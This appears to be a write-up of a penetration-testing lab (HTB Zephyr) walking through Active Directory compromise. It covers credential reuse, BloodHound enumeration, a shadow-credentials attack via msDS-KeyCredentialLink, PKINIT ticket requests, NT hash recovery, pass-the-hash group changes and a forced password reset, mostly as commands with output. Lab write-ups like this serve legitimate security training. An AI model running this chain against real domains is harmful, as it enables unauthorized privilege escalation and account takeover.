AD Enumeration

From the nmap scan we see there are two DCs.

zsm.local DC = 192.168.210.10

internal.zsm.local DC = 192.168.210.16

I tried running credentials from previous domain but none worked.

Here is using marcus's credentials. marcus:!QAZ2wsx found from Zabbix host.

SMB         192.168.210.14  445    ZPH-SVRADFS1     [+] zsm.local\marcus:!QAZ2wsx 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] internal.zsm.local\marcus:!QAZ2wsx STATUS_LOGON_FAILURE 
SMB         192.168.210.11  445    ZPH-SVRMGMT1     [+] zsm.local\marcus:!QAZ2wsx 
SMB         192.168.210.10  445    ZPH-SVRDC01      [+] zsm.local\marcus:!QAZ2wsx 
SMB         192.168.210.15  445    ZPH-SVRSQL01     [+] zsm.local\marcus:!QAZ2wsx 
SMB         192.168.210.12  445    ZPH-SVRCA01      [+] zsm.local\marcus:!QAZ2wsx

.Conf FIle

cat /etc/krb5.conf
[libdefaults]
    default_realm = ZSM.LOCAL  # Change this to the main domain you are working with
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    PAINTERS.HTB = {
        kdc = dc.painters.htb
        admin_server = dc.painters.htb
    }

    ZSM.LOCAL = {
        kdc = dc.zsm.local
        admin_server = dc.zsm.local
    }

    INTERNAL.ZSM.LOCAL = {
        kdc = dc.internal.zsm.local
        admin_server = dc.internal.zsm.local
    }

[domain_realm]
    .painters.htb = PAINTERS.HTB
    painters.htb = PAINTERS.HTB
    .zsm.local = ZSM.LOCAL
    zsm.local = ZSM.LOCAL
    .internal.zsm.local = INTERNAL.ZSM.LOCAL
    internal.zsm.local = INTERNAL.ZSM.LOCAL

Bloodhound

bloodhound-python -u marcus -p "\!QAZ2wsx" -ns 192.168.210.10 -d zsm.local -c all

pywhisker.py --dc-ip 192.168.210.10 -d "zsm.local" -u "marcus" -p "\!QAZ2wsx" --target "ZPH-SVRMGMT1$" --action "add"

[*] Searching for the target account
[*] Target user found: CN=ZPH-SVRMGMT1,CN=Computers,DC=zsm,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 25491d76-c3bf-8557-6a36-2d6819ce4692
[*] Updating the msDS-KeyCredentialLink attribute of ZPH-SVRMGMT1$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: H656e7aD.pfx
[+] PFX exportiert nach: H656e7aD.pfx
[i] Passwort für PFX: Gcam2YMbxqqGzIlgqx7k
[+] Saved PFX (#PKCS12) certificate & key at path: H656e7aD.pfx
[*] Must be used with password: Gcam2YMbxqqGzIlgqx7k
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Ippsec's video helped a lot!

gettgtpkinit.py -cert-pfx SVRMGMT1.pfx -pfx-pass Gcam2YMbxqqGzIlgqx7k ZSM.LOCAL/ZPH-SVRMGMT1$ ZPH-SVRMGMT1.ccache -dc-ip 192.168.210.10

2025-02-18 22:48:44,490 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-18 22:48:44,521 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-18 22:49:16,000 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-18 22:49:16,000 minikerberos INFO     b7e32eab82da3ae5a6cae984287eebbefb9a4b8662b11f0f97f00086c7a23ac5
INFO:minikerberos:b7e32eab82da3ae5a6cae984287eebbefb9a4b8662b11f0f97f00086c7a23ac5
2025-02-18 22:49:16,002 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

export KRB5CCNAME=~/Desktop/zephyr/zsm.local/ZPH-SVRMGMT1.ccache

Klist shows that we have it:

Ticket cache: FILE:/home/anonmak9/Desktop/zephyr/zsm.local/ZPH-SVRMGMT1.ccache
Default principal: [email protected]

Valid starting       Expires              Service principal
2025-02-18 22:49:20  2025-02-19 08:49:20  krbtgt/[email protected]

Recovering NT hash

getnthash.py ZSM.LOCAL/ZPH-SVRMGMT1$ -key b7e32eab82da3ae5a6cae984287eebbefb9a4b8662b11f0f97f00086c7a23ac5

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
89d0b56874f61ad38bad336a77b8ef2f

Testing

netexec smb 192.168.210.10 -u ZPH-SVRMGMT1$ -H 89d0b56874f61ad38bad336a77b8ef2f
SMB         192.168.210.10  445    ZPH-SVRDC01      [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.10  445    ZPH-SVRDC01      [+] zsm.local\ZPH-SVRMGMT1$:89d0b56874f61ad38bad336a77b8ef2f

pth-net rpc group addmem "GENERAL MANAGEMENT" "marcus" -U "ZSM.LOCAL"/"ZPH-SVRMGMT1$"%"ffffffffffffffffffffffffffffffff":"89d0b56874f61ad38bad336a77b8ef2f" -S "dc.zsm.local"

E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

Lets confirm if marcus was indeed added to the General Management group.

ldapsearch -x -H ldap://dc.zsm.local -D "[email protected]" -w "\!QAZ2wsx" -b "DC=zsm,DC=local" "(sAMAccountName=marcus)"
<SNIP>
dn: CN=Marcus Thompson,OU=Users,OU=Zephyr,OU=Sites,DC=zsm,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Marcus Thompson
sn: Thompson
givenName: Marcus
distinguishedName: CN=Marcus Thompson,OU=Users,OU=Zephyr,OU=Sites,DC=zsm,DC=lo
 cal
instanceType: 4
whenCreated: 20221026161921.0Z
whenChanged: 20250219033745.0Z
displayName: Marcus Thompson
uSNCreated: 114907
memberOf: CN=General Management,CN=Builtin,DC=zsm,DC=local
memberOf: CN=Zabbix Management,CN=Builtin,DC=zsm,DC=local
uSNChanged: 544938
name: Marcus Thompson
objectGUID:: x+NYEtrOr0KjN/dJ65Q9Qg==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 133293021786498249
lastLogoff: 0
lastLogon: 133844154561511662
logonHours:: ////////////////////////////
pwdLastSet: 133295763721717047
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAzvf5ojQxhRuwPHQIBhAAAA==
accountExpires: 0
logonCount: 96
sAMAccountName: marcus
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=zsm,DC=local
dSCorePropagationData: 20221026161921.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133844098651823936

<SNIP>

Indeed, memberOf: CN=General Management,CN=Builtin,DC=zsm,DC=local.

Now Marcus should be able to change password for the user jamie.

net rpc password "jamie" "N3wJami3" -U "ZSM.LOCAL"/"marcus"%"\!QAZ2wsx" -S "dc.zsm.local"

Lets confirm

netexec smb 192.168.210.0/24 -u jamie -p "N3wJami3"

SMB         192.168.210.12  445    ZPH-SVRCA01      [+] zsm.local\jamie:N3wJami3 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] internal.zsm.local\jamie:N3wJami3 STATUS_LOGON_FAILURE 
SMB         192.168.210.15  445    ZPH-SVRSQL01     [+] zsm.local\jamie:N3wJami3 
SMB         192.168.210.14  445    ZPH-SVRADFS1     [+] zsm.local\jamie:N3wJami3 
SMB         192.168.210.11  445    ZPH-SVRMGMT1     [+] zsm.local\jamie:N3wJami3 (Pwn3d!)
SMB         192.168.210.10  445    ZPH-SVRDC01      [+] zsm.local\jamie:N3wJami3

net rpc group addmem "CA Managers" "jamie" -U "ZSM.LOCAL"/"jamie"%"N3wJami3" -S "dc.zsm.local"

Confirm it

ldapsearch -x -H ldap://dc.zsm.local -D "[email protected]" -w "\!QAZ2wsx" -b "DC=zsm,DC=local" "(sAMAccountName=jamie)"

dn: CN=Jamie Smith,OU=Users,OU=Zephyr,OU=Sites,DC=zsm,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Jamie Smith
sn: Smith
givenName: Jamie
distinguishedName: CN=Jamie Smith,OU=Users,OU=Zephyr,OU=Sites,DC=zsm,DC=local
instanceType: 4
whenCreated: 20221028124803.0Z
whenChanged: 20250219051956.0Z
displayName: Jamie Smith
uSNCreated: 119051
memberOf: CN=General Management,CN=Builtin,DC=zsm,DC=local
memberOf: CN=CA Managers,CN=Builtin,DC=zsm,DC=local
<SNIP>

PreviousNmap NextZEPHYR-ZABBIX

Last updated 9 months ago